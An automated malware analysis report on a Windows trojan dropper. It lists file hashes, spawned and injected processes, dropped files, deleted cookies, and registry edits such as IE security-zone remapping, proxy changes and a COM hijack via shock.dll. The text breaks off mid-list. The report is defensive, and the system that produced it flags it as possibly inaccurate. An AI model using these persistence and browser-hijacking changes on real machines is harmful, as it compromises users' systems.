Trojan.Win32.Sasfis_416fdd6af6

by malwarelabrobot on May 6th, 2014 in Malware Descriptions.

Trojan-Dropper.Win32.Exetemp.a (Kaspersky), Trojan.Generic.1630494 (B) (Emsisoft), Trojan.Generic.1630494 (AdAware), Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, VirTool


This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 416fdd6af6fefbc60fa55fd21e249d36
SHA1: 41a67db370b029d8ac6b7fc7e15e95884e8d0dfc
SHA256: 599e0d9dbb34ff79fe37ef23f8ee90947418a1c9e4539d0eb54dd5a1a1b10f08
SSDeep: 24576:nS4hIC6wCINBMChyMfcOswCINBMiPp70JZM9Xuqb:S4hI1wCqvuwCMGoXp
Size: 802816 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: Piriform Ltd
Created at: 2009-03-13 07:28:29
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

EXE_temp1.EXE:308
shock.exe:3516
taskkill.exe:1700
EXE_temp4.EXE:1516
ping.exe:1580
ping.exe:1416
svchots.exe:3760
EXE_temp2.exe:1176
huodongtongzhi.exe:1032
netsh.exe:3916
MiniIE.exe:3436
qtool.exe:3460
EXE_temp0.exe:980
wpzir.exe:3300
%original file name%.exe:1040

The Trojan injects its code into the following process(es):

acsvc.exe:2168
dsau.exe:3672
objs.exe:3332
EXE_temp3.exe:816
Explorer.EXE:1752

File activity

The process EXE_temp1.EXE:308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (0 bytes)

The process shock.exe:3516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)
%WinDir%\JMt\sys32\shock.dll (845 bytes)

The Trojan deletes the following file(s):

%WinDir%\JMt\sys32\shock_new.dat0 (0 bytes)
%WinDir%\JMt\sys32\shock_new.dat1 (0 bytes)

The process EXE_temp4.EXE:1516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (0 bytes)

The process dsau.exe:3672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)

The process objs.exe:3332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (0 bytes)

The process svchots.exe:3760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\JMt\win32\DPro.sys (784 bytes)
%WinDir%\JMt\win32\reTcp.sys (196 bytes)
%WinDir%\JMt\win32\config.ini (46 bytes)
%WinDir%\JMt\win32\rename.exe (5480 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\_desktop.ie6[2].css (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\_desktop[2].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ya[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

The process EXE_temp3.exe:816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)
%WinDir%\share\kbdf.dat (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)
%Documents and Settings%\%current user%\Desktop\史上最劲爆游戏.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)
%WinDir%\share\ico.dll (129 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)
%System%\DqKgbb.dll (141 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)
%Documents and Settings%\%current user%\Desktop\成人游戏.lnk (1 bytes)
%WinDir%\share\rsvp\objs.exe (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)

The process EXE_temp0.exe:980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\JMt\wpzir.exe (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)
%WinDir%\JMt\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\JMt\win32\svchots.txt (70868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)
%WinDir%\JMt\sys32\shock.txt (18796 bytes)
%WinDir%\JMt\sys32\whitelist.dat (2 bytes)
%WinDir%\JMt\sys32\qtool.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)
%WinDir%\JMt\First.txt (6988 bytes)
%WinDir%\JMt\flist.bin (620 bytes)
%WinDir%\JMt\sys32\shock.exe (111 bytes)
%WinDir%\JMt\sys32\qtool.txt (26868 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%WinDir%\JMt\win32\svchots.exe (1695 bytes)
%WinDir%\JMt\MiniIE.txt (46228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)
%WinDir%\JMt\MiniIE.exe (272 bytes)

The process %original file name%.exe:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)

Registry activity

The process EXE_temp1.EXE:308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 B1 8E 83 03 EA B0 A9 40 2D 40 80 F2 38 45 CE"

The process acsvc.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 D4 A2 C7 44 4E 3A 95 23 39 19 9A 8C 1F 71 56"

The process shock.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 8D 27 10 3A D1 0A 9E 75 2C 67 9B C0 85 4E 12"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\TypeLib]
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Urladv.Adv\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Urladv.Adv]
"(Default)" = "Adv Class"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\TypeLib]
"Version" = "1.0"
"(Default)" = "{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}]
"(Default)" = "IAdv"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0]
"(Default)" = "urladv 1.0 Type Library"

[HKCR\Urladv.Adv\CurVer]
"(Default)" = "Urladv.Adv.1"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\VersionIndependentProgID]
"(Default)" = "Urladv.Adv"

[HKCR\Urladv.Adv.1]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}]
"(Default)" = "Adv Class"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\0\win32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\InprocServer32]
"(Default)" = "%WinDir%\JMt\sys32\shock.dll"

[HKCR\CLSID\{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}\ProgID]
"(Default)" = "Urladv.Adv.1"

[HKCR\Interface\{649FBF2D-FE00-44E6-8A98-B4350960D943}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urladv.Adv.1\CLSID]
"(Default)" = "{0EE16FA9-E135-43B5-8236-A0CC75F60BB6}"

[HKCR\TypeLib\{8003D2E5-F50C-4DC2-9670-C44ABCABCE02}\1.0\HELPDIR]
"(Default)" = "%WinDir%\JMt\sys32\"

The process taskkill.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 F2 29 83 26 3E D9 3A D8 57 28 9C 5D DF 6D 16"

The process EXE_temp4.EXE:1516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 46 00 20 C6 30 FF 68 8D 7C 6C 4C C4 98 CF 4A"

The process ping.exe:1580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 56 22 5A 93 95 6F 20 42 74 37 F4 F1 21 18 88"

The process ping.exe:1416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 B7 5D B6 17 80 23 9B 87 71 D4 34 94 5B 39 9E"

The process dsau.exe:3672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 92 00 A7 B7 49 39 EA 6E 35 EC 86 4B 06 44 38"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process objs.exe:3332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 DD A1 69 1E 03 0A F6 86 B4 8D E7 48 93 86 BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process svchots.exe:3760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\JMt\win32\rename.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 4E 79 67 40 E8 4D C6 21 BD 03 61 D7 2D B9 1C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{FB5F1910-F110-11d2-BB9E-00C04F795683}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process EXE_temp2.exe:1176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 4B 50 9D 69 C3 68 4B 87 05 F1 33 7A D0 FE 69"

[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\IEXPLORE.EXE -nohome"

The process huodongtongzhi.exe:1032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 4A 3F 34 3C F2 5F C9 19 43 A8 20 AA EC 77 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process netsh.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 1.1 Provider Data" = "0E 10 00 00 11 00 00 00 14 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
"WinSock 2.0 Provider ID" = "A0 1A 0F E7 8B AB CF 11 8C A3 00 80 5F 48 A1 92"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
